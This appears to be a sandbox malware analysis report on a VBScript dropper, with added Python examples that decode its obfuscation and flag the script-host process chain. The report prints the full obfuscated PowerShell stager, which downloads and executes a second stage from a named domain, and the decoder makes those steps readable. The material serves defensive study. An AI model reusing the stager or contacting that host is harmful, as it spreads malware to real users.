Windows Analysis Report
SKMBT20783_ZM.vbs

Overview

General Information

Sample name: SKMBT20783_ZM.vbs
Analysis ID: 1640544
MD5: 0e513e80fc18e3db4f0eb6ecb558534b
SHA1: ed04ef0cfbea67f8936132ec9a42650740566353
SHA256: 7444d08579781b3d7b233e9fd3e7f9b31a85837c29adf2f4ae7965a628078639
Tags: vbs, user-smica83

Detection

Score: 84
Range: 0 - 100
Confidence: 100%

Signatures

VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Joe Sandbox ML detected suspicious sample
Potential evasive VBS script found (sleep loop)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Writes or reads registry keys via WMI
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification (diagram not reproduced)

Process Tree

  • System is w10x64
  • wscript.exe (PID: 1432 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT20783_ZM.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WmiPrvSE.exe (PID: 5420 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 4020 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Russule; function Tvangsmiddels($Backgeared){$Submerge=4;do {$Ima+=$Backgeared[$Submerge];$Pjat=Format-List;$Submerge+=5} until(!$Backgeared[$Submerge])$Ima}function Ankomsterne($Dolors20){ .($Indeficiency) ($Dolors20)}$Ergoterapeutskoler=Tvangsmiddels 'Int,NHypeeMeteTObel.NykaW';$Ergoterapeutskoler+=Tvangsmiddels ',ngeEClieBErn cTricLHalviCen,eHom nForst';$Postethmoid=Tvangsmiddels 'SivaMTogfoDemizE triVarslBulllFlaca Da /';$Recuperator=Tvangsmiddels ' SinT A.ol Mi.svo d1Vi k2';$Destalinises136=' Nov[PussNBukseMisttGevi. WilS veeSkylrSvanVan oI Semc DiseAftepBetiO StoiWestn T,ltKlynM LacahydrNEft AEl aG B dE DisrSupp]Henv:Gunh: SmasCor E LreC acoustewrBargiFlu tPupiyFu fP ympRItenOSulptOffeOFinaC,alaoHaanlJ,me=Send$ TyfrSgekEMythC StoUEmbeP eskePolir ,araU maTBestOK,olR';$Postethmoid+=Tvangsmiddels 'Jnan5 Phr.Cham0cel, Ph,n(AssiWIn.eiHe enCo ndRiddo NonwCo gsPsyc AbroNFodeTNeut Pse1Ddni0genn. Shi0 Und; Ana SquiWAnstiW,rbnInte6 Tin4Pers; Hys AntexSpej6 Lus4kirk;Farb U,fjrGeo.vMacr:Efte1B ot3No.i4 S,u. egu0 nvr)term Ma.GLatieSvalcIndsk UdmoAmts/Repr2G rn0Kern1 niv0Dels0N bo1.rug0Re d1Tomo SlibFUd.eiAabnru.reeRamsf SigoRef xudv /Fode1fryg3 Dem4Derv.Retr0';$pseudocosta=Tvangsmiddels 'cannUud.rsPracE SemRGuar-Bu ia harGOpb,ePhilNHotet';$Butter=Tvangsmiddels ' rsthLamitBrent ,orpSubesanth:amat/I.gm/nordaAudig Selh SinaM gryD skehelmzBogkaMaoiyGnide MetaOunctChee. 
I diTrffrOilc/ intkB.haiPr,cd VedsBrom/ CatTwienyVek.rKanvoT.adsAfgiiDukknM kseOmnis Sub.Pu.hlEngazMellh';$Misfortuner=Tvangsmiddels 'Sag,>';$Indeficiency=Tvangsmiddels 'Sa gi eade P,rX';$Semidefiniteness139='Vaabenmrkerne';$Fiskerflaaden='\Hikes.Ove';Ankomsterne (Tvangsmiddels ' va$AtteGSubslhumaO agtbHeksahandlTelt: StaN WhiEUdruPEsc eA raNBrodd emmiF gesAvis=evol$slutESt rNSangvDavi: AliA SnnpUnd.PNotrdWhydaA phT DevaRepa+Beu $Kibyf oaiGibbs lbrKGe meB,ggr PosFHalsLTandAPostAExo.dR vrEBilln');Ankomsterne (Tvangsmiddels 'Lige$Sed,GBe tL,resoSounBTrumaForllOpb :VermKOdondclinf CerUO krlAngsdObcl= Svl$Indubsog UAntit athtWiree MesRProf. EvoS Undpb sclLegeiSjllTIn u( I f$ HaaMKompI L,dSPropFBillOUranR braT TilUCrisNK.oaeOmslrSkid)');Ankomsterne (Tvangsmiddels $Destalinises136);$Butter=$Kdfuld[0];$Keyseat=(Tvangsmiddels ' Lim$ QuiG,orsL,ubboUnivBCensAOverlTjen:Pi.kIModfnPl sFp ntO ,ksrFrinMKum ATr.nT.abbIXy ioParaNGomeSDegliPo iNDodedOldnSTopaAK imTBulbsTils=Sucrn,alsEUmu w Tyd-DelsOInt,B.undJInhaEKir cIn eTReso P.aS T,yyaspasBlint.amie UnpMBou .Chef$Bl,rESkanRH stGMedsoAntitRespe VeaRFaktaAltrPVercEFormuFritTAgris Re KNontOGa.llPulpeSyndr');Ankomsterne ($Keyseat);Ankomsterne (Tvangsmiddels 'Slvp$Kn kIrushnPennfChicoMajbrRdtjm Coma OvetCataiRelaoVertnInddschloiTak n Ta.dportsSeisaPastt FidsHost.BagsHShore vfdaBur.dn rremirarMuresfarl[Purp$Anopp TegsSimieKnuruFlomdshi oPraecEinsoT rts Dkkt etraobse] odi=Acti$BolsPFondophi sPriztLimieButttBackh KhamBomroOu biUdkrd');$Mourningly=Tvangsmiddels 'Hove$SgsmI GalnMe,ifTve,oBenarUds.mMul a MtatPapiiDerioNon.nSkrisTorni adinJctgd TrksRotaaSkrgtAntisFore. 
BaaDUnivoGrouw BilnKapilRituo edbaHal dGrufF Pi,iFornl loae Lay( ans$al,eBDecaugloetOpprtforke DinrPlon,,ary$CantSre teP.otiD.lessek.mBloko Sk lKure)';$Seismol=$Nependis;Ankomsterne (Tvangsmiddels 'Ho,s$WerngMikrLDarroStalbunreAUd al Yok:.kgam KviGGainF HiraFlodl idsDL,seeUdvitSlagS,nke=Asmi( AartunsieR ngsUerhTHelb-UnropkommAPinetBlo HHu.n Henv$LedtS Ko.eRediI Di.S IhuMPausO UsalTale)');while (!$mgfaldets) {Ankomsterne (Tvangsmiddels 'Frde$ Angg Ultl D.roTa.kbHvlva Pollnonv:A klK ndoagopluTurikcym aRa,isUptuiNonceSickrdistnOc,reFriksVare= Sec$Klo,CUndeoVitenLivljHudluovercN octCataiThegvQuena') ;Ankomsterne $Mourningly;Ankomsterne (Tvangsmiddels 'Open[VerdtKl,pHGastREmulEAlloaAp sD Besi ParNDetegW,ol.S lvti teH V drBurbeTutoAGip,DUnd ]Poet: ige:TolvSUdlilHaste,lerEHa pPSono(F,re4Ur d0Paci0Medi0Fagp)');Ankomsterne (Tvangsmiddels ' Uni$Bed GBfpoL S rOObjeBSisya ifflRemo:sukkmUnvigR.mofsamaA JudlV.ind TileSeleTY,glSUfri= For( PheTA ybE b is HemT Sol- P,opOutpAConctarchhbedi Se.m$ .nrsDy aeFeltIImprSzin m ffioCranl Lan)') ;Ankomsterne (Tvangsmiddels 'Skuf$UnivgEftelBaskOVelfBbaseASu aL gag:InclPkorrUSpdbLSca =Pava$seddGTidoLSkilo BreB JudAUndelTil :RayneVertriridYReskt yshKommRB,llEH lmnRefeeDres+rds +Refo%wo s$Kv kKPaatdOphnF prauPreelDi.tdUnre. 
remcSpriOWhopUAftaN Arbt') ;$Butter=$Kdfuld[$Pul]}$Filologs=332816;$Bandlysninger=31302;Ankomsterne (Tvangsmiddels 'Sluk$DisaGS rylBocco ForbC loADrablObdi: efaG SomlGrusY TraPCarbHCitrOAarsGOwasRJobbapregp AdjHDioi My i= Acc OutlgDeisE KonTPiet- Varc MidOBot NFje,tOpmuEThunNinteT Uko at$TribsAcc,e DecI Skys StiMIncuOViscL');Ankomsterne (Tvangsmiddels 'staf$SympgUaktlG,laobehebSa ua udvlPert: spoSUnd tSordrSt aa loynKlbndF onhModsuMustgChils nstGnideMe,lr FiosSoci Atio=Herm Int [BumpSKredymormsGo,otCarceTit mPaha.Ev.lCFieloSnign,attv RegeBesmr.rudtSpro]Gula:Pseu:Plu Fcrocr,ssyo RidmRepoBDosiaSquas Laee Bun6 Gui4AnemS BrytBlinrCorbiColon smigViru(A is$UnreG,amel SkeyConcpSgekhFr,toMollg OpmrJakoaForep VejhSkon)');Ankomsterne (Tvangsmiddels 'Ele $CostGPr aLKattOmineBUgenA AfsLFul : ocapSheloDia LKepiINvebNTonsi R jCarkiePerssSan, Spro= Sid L v[UforSlar y,efoSSlg t P reLaryM Dis. achtKommE,attxSupeTMa.t.KoorEErnrn.eguCU.ino lidForliAnekNSkytGElek]M sr: he:SacrA genSmaskC DefIDip IArer.PanaGS riePr mttillsDeintStavrP ajIUnslnDecugPi,i(N an$UnprsS mftOks.r.anoA E gNMultdFejlhLoboUAandGT mpSSammtBasse LotrDi tsAnnu)');Ankomsterne (Tvangsmiddels 'mult$ urngUnrolRespoRiffBNitaAPhytLIntr:RevipHft R SkoIGud,sLlamVLandrStafDUdvai Uncg forS elTUn eeOutf=R,gh$Pr,hPT ldOInarlDefliBeh N D.tiForaCFor.ET baSNona. Recs,dspuTerpB xiSAntiT NonrDrabIKol nDekaGLini( Rom$k naf ,isIary LTarioUdkol ForoEt,dgS.icSNgst,Or i$EpigB Ap A V nN tylD edeLAnthYBu lsUnflnSpecIRaslN Ch gTilbeShrirHypa)');Ankomsterne $Prisvrdigste;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 3972 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
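The PowerShell argument in the process tree above hides every string behind the helper `Tvangsmiddels`: it keeps the character at index 4 and then every fifth character after it, so each 5-character group carries one real character padded by four characters of Danish filler. The following is an added example, not part of the Joe Sandbox report: a Python decoder that replays that loop over the literals printed above, folds `+=` concatenations, and flags literals whose length is not a multiple of 5. That flag matters here because the report text has dropped the non-ASCII characters of the filler words, which knocks later groups out of step. The input is constructed from the literals printed in the report; the two literals that wrap across a line in the report were rejoined with the single space that stood there (the decoded URL matches the `https://aghayezayeat.ir/kids/Tyrosines.lzh` string the sandbox later found in powershell.exe memory, which confirms the join).

```python
"""Decoder for the every-5th-character string obfuscation used by the sample's PowerShell stager."""
import re
from typing import Dict, List

START, STRIDE = 4, 5  # the stager's helper starts at index 4 and steps by 5

# Constructed input: literals copied from the report's command line and restitched into the
# "$Var=Tvangsmiddels '...'" shape the stager uses.  The two literals that wrap across a line in
# the report were rejoined with the single space that stood there.
URL_LITERAL = (" rsthLamitBrent ,orpSubesanth:amat/I.gm/nordaAudig Selh SinaM gryD skehelmz"
               "BogkaMaoiyGnide MetaOunctChee. I diTrffrOilc/ intkB.haiPr,cd VedsBrom/ CatT"
               "wienyVek.rKanvoT.adsAfgiiDukknM kseOmnis Sub.Pu.hlEngazMellh")
DL_LITERAL = ("Hove$SgsmI GalnMe,ifTve,oBenarUds.mMul a MtatPapiiDerioNon.nSkrisTorni adinJctgd "
              "TrksRotaaSkrgtAntisFore. BaaDUnivoGrouw BilnKapilRituo edbaHal dGrufF Pi,iFornl "
              "loae Lay( ans$al,eBDecaugloetOpprtforke DinrPlon,,ary$CantSre teP.otiD.lessek.mBloko Sk lKure)")
# Exactly as printed in the report: the extraction dropped non-ASCII filler characters, so the
# 5-character groups fall out of step part-way through and the tail decodes to garbage.
UA_LITERAL = ("Jnan5 Phr.Cham0cel, Ph,n(AssiWIn.eiHe enCo ndRiddo NonwCo gsPsyc AbroNFodeTNeut "
              "Pse1Ddni0genn. Shi0 Und; Ana SquiWAnstiW,rbnInte6 Tin4Pers; Hys AntexSpej6 Lus4kirk;"
              "Farb U,fjrGeo.vMacr:Efte1B ot3No.i4 S,u. egu0 nvr)term Ma.GLatieSvalcIndsk UdmoAmts/"
              "Repr2G rn0Kern1 niv0Dels0N bo1.rug0Re d1Tomo SlibFUd.eiAabnru.reeRamsf SigoRef xudv /"
              "Fode1fryg3 Dem4Derv.Retr0")

SAMPLE_CMDLINE = (
    "echo $Russule; function Tvangsmiddels($Backgeared){$Submerge=4;do {$Ima+=$Backgeared[$Submerge];"
    "$Pjat=Format-List;$Submerge+=5} until(!$Backgeared[$Submerge])$Ima}"
    "function Ankomsterne($Dolors20){ .($Indeficiency) ($Dolors20)}"
    "$Ergoterapeutskoler=Tvangsmiddels 'Int,NHypeeMeteTObel.NykaW';"
    "$Ergoterapeutskoler+=Tvangsmiddels ',ngeEClieBErn cTricLHalviCen,eHom nForst';"
    "$Postethmoid=Tvangsmiddels 'SivaMTogfoDemizE triVarslBulllFlaca Da /';"
    "$Recuperator=Tvangsmiddels ' SinT A.ol Mi.svo d1Vi k2';"
    f"$Postethmoid+=Tvangsmiddels '{UA_LITERAL}';"
    "$pseudocosta=Tvangsmiddels 'cannUud.rsPracE SemRGuar-Bu ia harGOpb,ePhilNHotet';"
    f"$Butter=Tvangsmiddels '{URL_LITERAL}';"
    "$Misfortuner=Tvangsmiddels 'Sag,>';"
    "$Indeficiency=Tvangsmiddels 'Sa gi eade P,rX';"
    f"$Mourningly=Tvangsmiddels '{DL_LITERAL}';"
)

# One assignment of the form  $Var=Tvangsmiddels '...'  or  $Var+=Tvangsmiddels '...'
ASSIGN_RE = re.compile(r"(\$[A-Za-z0-9_]+)\s*(\+?=)\s*Tvangsmiddels\s+'([^']*)'")


def decode_literal(literal: str) -> str:
    """Mirror the stager's loop: collect literal[4], literal[9], ... until the index runs off the end."""
    return literal[START::STRIDE]


def is_damaged(literal: str) -> bool:
    """Heuristic: an intact literal is a whole number of 5-character groups.  A literal that lost a
    filler character (here: Danish ae/oe/aa dropped by the report's text extraction) fails this test,
    and everything after the short group decodes wrongly.  A literal that lost exactly five
    characters still passes, so treat the check as a hint, not proof."""
    return len(literal) % STRIDE != 0


def resolve_variables(cmdline: str) -> Dict[str, str]:
    """Decode every Tvangsmiddels assignment in order and fold += concatenations."""
    values: Dict[str, str] = {}
    for var, op, lit in ASSIGN_RE.findall(cmdline):
        plain = decode_literal(lit)
        values[var] = values.get(var, "") + plain if op == "+=" else plain
    return values


def damaged_variables(cmdline: str) -> List[str]:
    """Variables whose decoded value rests on at least one length-mismatched literal."""
    return sorted({var for var, _, lit in ASSIGN_RE.findall(cmdline) if is_damaged(lit)})


if __name__ == "__main__":
    unreliable = set(damaged_variables(SAMPLE_CMDLINE))
    for var, plain in resolve_variables(SAMPLE_CMDLINE).items():
        note = "   [literal length not a multiple of 5: unreliable past the first damaged group]" if var in unreliable else ""
        print(f"{var} = {plain!r}{note}")
```

Running it lays the stager's skeleton bare: `$Ergoterapeutskoler` is `NeT.WEBcLient` (PowerShell is case-insensitive, so this is `New-Object Net.WebClient`), `$Recuperator` is `Tls12`, `$pseudocosta` is the `UsER-aGeNt` header name and `$Postethmoid` its `Mozilla/5.0 (Windows NT ...` value, `$Indeficiency` is `ieX`, which makes `Ankomsterne` an `Invoke-Expression` wrapper, `$Butter` is the download URL, and `$Mourningly` is `$Informationsindsats.DownloadFile($Butter,$Seismol)`, the fetch of the second stage to disk. The User-Agent literal is reported as damaged, which is why its tail does not decode; anything that turns to nonsense mid-way should be re-derived from the original .vbs rather than from the report text.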
Source: Process Memory Space: powershell.exe PID: 4020; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
Source: amsi64_4020.amsi.csv; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security

      System Summary

      Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT20783_ZM.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT20783_ZM.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT20783_ZM.vbs", ProcessId: 1432, ProcessName: wscript.exe
      Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT20783_ZM.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT20783_ZM.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT20783_ZM.vbs", ProcessId: 1432, ProcessName: wscript.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Russule; function Tvangsmiddels($Backgeared){$Submerge=4;do {$Ima+=$Backgeared[$Submerge];$Pjat=Format-List;$Submerge+=5} until(!$Backgeared[$Submerge])$Ima}function Ankomsterne($Dolors20){ .($Indeficiency) ($Dolors20)}$Ergoterapeutskoler=Tvangsmiddels 'Int,NHypeeMeteTObel.NykaW';$Ergoterapeutskoler+=Tvangsmiddels ',ngeEClieBErn cTricLHalviCen,eHom nForst';$Postethmoid=Tvangsmiddels 'SivaMTogfoDemizE triVarslBulllFlaca Da /';$Recuperator=Tvangsmiddels ' SinT A.ol Mi.svo d1Vi k2';$Destalinises136=' Nov[PussNBukseMisttGevi. WilS veeSkylrSvanVan oI Semc DiseAftepBetiO StoiWestn T,ltKlynM LacahydrNEft AEl aG B dE DisrSupp]Henv:Gunh: SmasCor E LreC acoustewrBargiFlu tPupiyFu fP ympRItenOSulptOffeOFinaC,alaoHaanlJ,me=Send$ TyfrSgekEMythC StoUEmbeP eskePolir ,araU maTBestOK,olR';$Postethmoid+=Tvangsmiddels 'Jnan5 Phr.Cham0cel, Ph,n(AssiWIn.eiHe enCo ndRiddo NonwCo gsPsyc AbroNFodeTNeut Pse1Ddni0genn. Shi0 Und; Ana SquiWAnstiW,rbnInte6 Tin4Pers; Hys AntexSpej6 Lus4kirk;Farb U,fjrGeo.vMacr:Efte1B ot3No.i4 S,u. egu0 nvr)term Ma.GLatieSvalcIndsk UdmoAmts/Repr2G rn0Kern1 niv0Dels0N bo1.rug0Re d1Tomo SlibFUd.eiAabnru.reeRamsf SigoRef xudv /Fode1fryg3 Dem4Derv.Retr0';$pseudocosta=Tvangsmiddels 'cannUud.rsPracE SemRGuar-Bu ia harGOpb,ePhilNHotet';$Butter=Tvangsmiddels ' rsthLamitBrent ,orpSubesanth:amat/I.gm/nordaAudig Selh SinaM gryD skehelmzBogkaMaoiyGnide MetaOunctChee. 
I diTrffrOilc/ intkB.haiPr,cd VedsBrom/ CatTwienyVek.rKanvoT.adsAfgiiDukknM kseOmnis Sub.Pu.hlEngazMellh';$Misfortuner=Tvangsmiddels 'Sag,>';$Indeficiency=Tvangsmiddels 'Sa gi eade P,rX';$Semidefiniteness139='Vaabenmrkerne';$Fiskerflaaden='\Hikes.Ove';Ankomsterne (Tvangsmiddels ' va$AtteGSubslhumaO agtbHeksahandlTelt: StaN WhiEUdruPEsc eA raNBrodd emmiF gesAvis=evol$slutESt rNSangvDavi: AliA SnnpUnd.PNotrdWhydaA phT DevaRepa+Beu $Kibyf oaiGibbs lbrKGe meB,ggr PosFHalsLTandAPostAExo.dR vrEBilln');Ankomsterne (Tvangsmiddels 'Lige$Sed,GBe tL,resoSounBTrumaForllOpb :VermKOdondclinf CerUO krlAngsdObcl= Svl$Indubsog UAntit athtWiree MesRProf. EvoS Undpb sclLegeiSjllTIn u( I f$ HaaMKompI L,dSPropFBillOUranR braT TilUCrisNK.oaeOmslrSkid)');Ankomsterne (Tvangsmiddels $Destalinises136);$Butter=$Kdfuld[0];$Keyseat=(Tvangsmiddels ' Lim$ QuiG,orsL,ubboUnivBCensAOverlTjen:Pi.kIModfnPl sFp ntO ,ksrFrinMKum ATr.nT.abbIXy ioParaNGomeSDegliPo iNDodedOldnSTopaAK imTBulbsTils=Sucrn,alsEUmu w Tyd-DelsOInt,B.undJInhaEKir cIn eTReso P.aS T,yyaspasBlint.amie UnpMBou .Chef$Bl,rESkanRH stGMedsoAntitRespe VeaRFaktaAltrPVercEFormuFritTAgris Re KNontOGa.llPulpeSyndr');Ankomsterne ($Keyseat);Ankomsterne (Tvangsmiddels 'Slvp$Kn kIrushnPennfChicoMajbrRdtjm Coma OvetCataiRelaoVertnInddschloiTak n Ta.dportsSeisaPastt FidsHost.BagsHShore vfdaBur.dn rremirarMuresfarl[Purp$Anopp TegsSimieKnuruFlomdshi oPraecEinsoT rts Dkkt etraobse] odi=Acti$BolsPFondophi sPriztLimieButttBackh KhamBomroOu biUdkrd');$Mourningly=Tvangsmiddels 'Hove$SgsmI GalnMe,ifTve
      Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3972, ProcessName: svchost.exe
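The process-start matches above all key on the same chain: a script host started with a .vbs argument (PID 1432), that script host spawning powershell.exe (PID 4020), and, from the report's own signatures, a command line of unusual length (5868 bytes here). The following is an added example, not part of the report and not the Sigma rules themselves: a Python triage that re-creates those three checks and runs them over constructed process-start events modelled on the report's process tree (same PIDs, parents and images; the PowerShell argument is shortened to its opening and padded to a realistic length). The 1000-byte length threshold is an assumption.

```python
"""Process-start triage mirroring the script-host detections in the report."""
import re
from dataclasses import dataclass
from typing import List, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
CHILD_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# A Windows Script Host file name at the end of the command line, with or without a closing quote.
WSH_FILE_RE = re.compile(r'\.(vbs|vbe|js|jse|wsf|wsh)"?\s*$', re.IGNORECASE)
LONG_CMDLINE = 1000  # assumed threshold; the report counts its 5868-byte command line as "very long"


@dataclass
class ProcessStart:
    pid: int
    ppid: int
    image: str
    cmdline: str


def image_name(path: str) -> str:
    """Case-folded file name of an image path, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events: List[ProcessStart]) -> List[Tuple[int, str]]:
    """Return (pid, finding) pairs in event order; parents are resolved within the supplied events only."""
    by_pid = {e.pid: e for e in events}
    findings: List[Tuple[int, str]] = []
    for e in events:
        name = image_name(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = image_name(parent.image) if parent else ""
        if name in SCRIPT_HOSTS and WSH_FILE_RE.search(e.cmdline):
            findings.append((e.pid, "wsh_file_run_by_script_host"))   # WSF/JSE/JS/VBA/VBE via cscript/wscript
        if parent_name in SCRIPT_HOSTS and name in CHILD_SHELLS:
            findings.append((e.pid, "script_host_spawned_shell"))     # WScript or CScript dropper
        if len(e.cmdline) > LONG_CMDLINE:
            findings.append((e.pid, "very_long_command_line"))        # very long command line
    return findings


# Constructed events (not sandbox output) modelled on the report's process tree.
STAGER_PREFIX = ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "echo $Russule; '
                 "function Tvangsmiddels($Backgeared){$Submerge=4;do {$Ima+=$Backgeared[$Submerge];"
                 "$Pjat=Format-List;$Submerge+=5} until(!$Backgeared[$Submerge])$Ima}")
SAMPLE_EVENTS = [
    ProcessStart(1432, 4088, r"C:\Windows\System32\wscript.exe",
                 r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT20783_ZM.vbs"'),
    ProcessStart(5420, 1432, r"C:\Windows\System32\wbem\WmiPrvSE.exe",
                 r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"),
    ProcessStart(4020, 1432, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 STAGER_PREFIX + "$Butter=Tvangsmiddels '" + "Xxxx." * 1100 + "';\""),  # padded, not the real literal
    ProcessStart(6800, 4020, r"C:\Windows\System32\conhost.exe",
                 r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcessStart(3972, 628, r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS"),
]

if __name__ == "__main__":
    for pid, finding in triage(SAMPLE_EVENTS):
        print(f"PID {pid}: {finding}")
```

The parent of wscript.exe (PID 4088) is absent from the constructed events, as it is from the report, so the first check relies only on the script host's own command line; conhost.exe and the BITS svchost.exe produce nothing, which is the expected baseline on this chain.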
      No Suricata rule has matched

      AV Detection

      Source: Submitted sample; Integrated Neural Analysis Model: Matched 97.2% probability
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2203959925.00000270FD0C2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.2203959925.00000270FD060000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: em.Core.pdbpdb source: powershell.exe, 00000002.00000002.2199935170.00000270FAF94000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbT source: powershell.exe, 00000002.00000002.2203959925.00000270FD0B9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.2203959925.00000270FD0B9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2203959925.00000270FD0C2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2202210988.00000270FCE95000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.2202210988.00000270FCE95000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: embly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2202210988.00000270FCEC6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: utomation.pdb source: powershell.exe, 00000002.00000002.2199935170.00000270FAF94000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.2203959925.00000270FD060000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2203959925.00000270FD0C2000.00000004.00000020.00020000.00000000.sdmp

      Software Vulnerabilities

      Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic; DNS traffic detected: DNS query: aghayezayeat.ir
      Source: svchost.exe, 00000005.00000002.2174549734.0000025CEFC00000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.ver)
